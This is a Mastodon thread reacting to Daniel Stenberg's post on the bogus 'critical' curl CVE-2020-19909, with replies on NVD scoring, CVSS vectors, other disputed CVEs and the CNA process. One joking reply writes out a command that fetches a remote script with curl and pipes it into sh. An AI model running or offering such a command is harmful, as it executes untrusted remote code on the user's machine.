Mastodawn

Alexander Lauster Aug 27, 2023

daniel:// stenberg://

"CVE-2020-19909 is everything that is wrong with CVEs"

A claimed "9.8 CRITICAL" flaw in #curl that does not exist.

https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/

CVE-2020-19909 is everything that is wrong with CVEs

This is a story consisting of several little building blocks and they occurred spread out in time and in different places. It is a story that shows with clarity how our current system with CVE Ids and lots of power given to NVD is a completely broken system. CVE-2020-19909 On August 25 2023, we got … Continue reading CVE-2020-19909 is everything that is wrong with CVEs →

daniel.haxx.se

daniel:// stenberg://Aug 25, 2023

We have enough problems with NVD inflating our *real* issues, doing the same thing with imaginary issues is so next level.

IT HURTS DEEP IN MY SOUL.

King of Red Lions Aug 26, 2023

@bagder maybe the severity of this issue is so negative that it causes NVD to run into an integer overflow of their own? 😂

Talya (she/her) 🏳️‍⚧️✡️Aug 26, 2023

@bagder
well, guess whose Wikipedia article now includes this erroneous reporting by them, including some juicy quotes in-paragrah?
(hope this at least makes you feel slightly better)

BenBE Aug 26, 2023

@bagder I wonder what would happen, if you CVSS'd a typo as 10.0 in some README file as remotely exploitable and gave it an imaginary CVE-2040-404, just to mess with people …? Best published the day after a March 31th …

daniel:// stenberg://Aug 26, 2023

on hacker news => https://news.ycombinator.com/item?id=37267940

CVE-2020-19909 is everything that is wrong with CVEs | Hacker News

Stefan Eissing Aug 26, 2023

@bagder centralized convenience service always enshittify. Sadly.

Stefan Eissing Aug 26, 2023

@bagder or: the security industry writes themselves some minivans.

@bagder can you see any path forward where maintainers who want to could have a bigger role in maintaining their CVE list? Has NIST or would NIST consider such a thing, or would we need a whole new platform? Is there already a better alternative we could start preferring?

daniel:// stenberg://Aug 25, 2023

@dbanty I'm not that familiar with all the processes and details to tell.People tend to tell me "you should become your own CNA" as if that makes things better, but I have no idea. And also seems like a complicated way as surely not everyone can be CNAs. This system clearly needs fixing though.

@bagder @dbanty Hey Daniel, I've run a CNA before (for Puppet) and I would be happy to have a chat about the pros and cons and how it may help you with some of these

ISSOtm Aug 25, 2023

@bagder I saw "CVE-2020-*" in the title, and thought you were simply bringing up an old post... then I noticed the 2023 in the URL and ???

...the fuck, too

Max Aug 25, 2023

@bagder be grateful they didn’t rate it a 9.9 😉 ever wondered what kind of “security incident” would warrant a solid 10.0 for curl? 😄

Ian Douglas Scott Aug 25, 2023

@maxbob @bagder Naturally we're using the Spinal Tap scale for severity, so a *buffer* overflow would rate 11/10.

phi1997 Aug 25, 2023

@maxbob
If you point curl at a URL with malicious code, you can download malicious code
@bagder

Peter Jakobs ⛵Aug 26, 2023

@phi1997 @maxbob @bagder but that would still require user intervention, running curl that is, which afaik would not qualify for a 10

(and - as my brain is still a bit slower than my fingers, I noticed the cynicism in your reply)

GUILTY! Confiscation! Death Penalty!Aug 26, 2023

@maxbob @bagder curl 10.0 CVE: an attacker can execute arbitrary code from a remote source by running sh -c "$(curl -fsSL https://haxx.info)" on the victim's computer!!! /j

@maxbob @bagder I doubt curl could ever get a CVSSv3.1 10.0 unless there's some buried option to let it run as a service in the background unattended, listening on the network.

It'd pretty well always require user interaction, which caps a score at 9.6.

I could imagine some scenarios where like, if it was vulnerable to something a server could do in response to a request you could maybe get it up to that 9.6, but it would always be a 9.6 for curl as a utility itself.

Applications that link libcurl and use it for process urls and handle responses could maybe be higher in this hypothetical scenario but that wouldn't be down to curl itself.

verified_coffee

Heartbleed?

FlorianTischner Aug 25, 2023

Seems like legal action might be in order.

Battle Programmer Yuu Aug 25, 2023

@bagder I've called out a few bogus CVEs like this. There was one where after it was closed and rejected, it was filed AGAIN when the version bumped on GitHub. Article:
https://hackaday.com/2023/07/07/this-week-in-security-bogus-cves-bogus-pocs-and-maybe-a-bogus-breach/

This Week In Security: Bogus CVEs, Bogus PoCs, And Maybe A Bogus Breach

It appears we have something of a problem. It’s not really a new problem, and shouldn’t be too surprising, but it did pop up again this week: bogus CVEs. Starting out in the security fi…

Hackaday

Stanislav Ochotnický Aug 25, 2023

@bagder that cvss vector makes no sense either. No wonder they came up with that score.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

@drizzy @bagder I enjoy UI:N for a command-line tool where the bug (not vulnerability) is a specific flag you have to use.

This seems maliciously done by whomever reported it as a security issue in the first place IMO. NVD is a bit of a silly middleman pushing papers but I have no idea how TF they came up with that scoring.

Nick Botticelli Aug 26, 2023

@bagder Reminds me of when I looked into a high severity code execution vulnerability in Notepad++ (with its own CVE of course) for a university course assignment, which allegedly worked by simply opening a maliciously crafted file. The “high severity exploit” was simply generating an exception in a C++ std function and crashing. The vulnerability did not exist and I’m still mad about the time I wasted on it. 🥲

@bagder there was something similar with the h2 dB system within the last few weeks, CVE-2022-45868.
Similar thing with it not actually being an issue, the project not being informed until soneone asked them about it.

ilmari Aug 26, 2023

@4censord @bagder PostgreSQL's CVE-2019-9193 is another fun one. The security team explained to the reporter that it was by design, but they still went ahead and filed for a CVE!

CVE-2019-9193: Not a Security Vulnerability

There is widespread mention in the media of a security vulnerability in PostgreSQL, registered as [CVE-2019-9193](https://nvd.nist.gov/vuln/detail/CVE-2019-9193). The PostgreSQL Security Team …

PostgreSQL News

Talya (she/her) 🏳️‍⚧️✡️Aug 26, 2023

@ilmari @4censord @bagder
and there was also the classic CVE-2023-24068/9 in @signalapp 's Desktop client that required the exploiter to already have full acess to the machine, at which point they can just straight up open the client...

https://mastodon.world/@Mer__edith/109751701529562752

Meredith Whittaker (@[email protected])

The report by johnjhacking is confused. What they propose requires a level of access that's only available if the device is already completely compromised: “First and foremost, you need access to the device.” TLDR someone compromising your device is not a problem with Signal. Yes, someone with that level of access to your device can do just about anything you can, like open Signal Desktop, look at your photos, review your browser history, etc.

Mastodon

monpop Aug 26, 2023

@bagder wait…. So it’s just a bug? If it overflows it just executes, that’s all? Could an attacker do anything with that?

@monpop @bagder Is control of the command line in the threat model? I would be surprised if it is, I guess. Then the attacker has your machine already.

Rafael Kassner Aug 26, 2023

@bagder sounds like Chatbots are now reporting CVEs -.-

DarkCyberman Aug 26, 2023

@bagder As a way of saying how old I am without saying how old I am. Mitre used to have a mechanism that potential issues were assigned a CAN-number. Then the elite would vote if it was indeed a vulnerability. If so, a CAN would become a CVE. Of course this soon became a mess as the CANs piled up and checking if a CAN ended up as CVE just for reference became a dreadful chore. I guess you’re on the accepted risk end of the choice made to end the CAN/CVE naming and stick with CVE.

Shortfinga Aug 26, 2023

@bagder I can recommend becoming a CNA (https://www.cve.org/ResourcesSupport/Glossary?activeTerm=glossaryCNA) not much work and you get all CVEs reported and you need to assign them. There is a escalation process though in case the reporter disagrees with your assessment. We became CNA this year and I enjoy it!

cve-website

daniel:// stenberg://Aug 26, 2023

@Shortfinga in a case like this, how would being a CNA have changed things? Does it prohibit other CNAs to submit CVEs for your products?

Remi Gacogne Aug 26, 2023

@bagder @Shortfinga Yes, it does. Only Mitre could then decide to allocate a CVE after hearing all parties.

daniel:// stenberg://Aug 26, 2023

@rgacogne @Shortfinga Thanks. It seems going full CNA is the best way for us to control this madness.

Derick Rethans Aug 26, 2023

@bagder @rgacogne @Shortfinga The PHP project is one too. I've done it for one and although not easy, it isn't terrible either.

P4 Aug 26, 2023

@bagder I've noticed a small error in the time conversions in your post: "two million seconds (roughly 68 years)" - this should be either 2 billion seconds or ~23 days.
EDIT: fixed now, thanks.

P4 Aug 26, 2023

@bagder Also, this totally ruins my plan of building a space probe running curl 7.65.2 on Windows that would communicate over http with a server in another galaxy.

daniel:// stenberg://Aug 26, 2023

@p4 it struck me as well. Thanks, will correct soon!

Peter Jakobs ⛵Aug 26, 2023

@bagder looking at the scoring, someone had a field day here
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H&version=3.1
Vector: network? I would think local
User interaction none? Who puts on the delay value?
And impact metrics all high? When setting a wait time that would wrap around, I would say this increases availability 🤭

NVD - CVSS v3 Calculator

@bagder Hope it gets rejected ASAP + Keep up the awesome work (and keep fixing the mistakes that can and will happen).

Kevin Bowen (has moved)

@bagder #pytest seems to have had another similar abuse, recently, of the #CVE system that caused a great deal of churn for their project:

https://github.com/pytest-dev/py/issues/287

I guess there are some new folks to the 'security' field who look to score points by filing vulnerability reports without considering the consequences, or impact.

ReDoS vulnerability in svnurl.py · Issue #287 · pytest-dev/py

Good night! I found that this regex is vulnerable to Regular Expression Denial of Service. PoC: >>> from py._path.svnurl import InfoSvnCommand >>> payl = " 2256 hpk 165 Nov 24 17:55 __init__.py" + ...

GitHub

gunstick Aug 26, 2023

@bagder makes me think: if anyone besides the project owner can file a CVE, why has nobody filed one for the recent Microsoft cloud failure? Everyone was complaining about Microsoft not creating a CVE because it was cloud. But nobody created one on their behalf?

mirabilos Aug 26, 2023

@bagder this is crazy (as is the NVD post you linked).

In theory, the compiler could change the integer overflow to code that deletes all files, instead of truncating, though, so it is a problem. Just not as crass as that, and most software is affected by that problem class because C is stupid.

Aditya Aug 26, 2023

@bagder NVD should be handed over to more open/non-profit orgs like internetsociety.org under which is IETF, instead of US govt

Del Aug 26, 2023

@bagder Hm, given that this is a popular/newsworthy story I’m guessing that malicious CVEs probably aren’t a very common problem. He seems to be contesting it. Glad to see that the system is working well.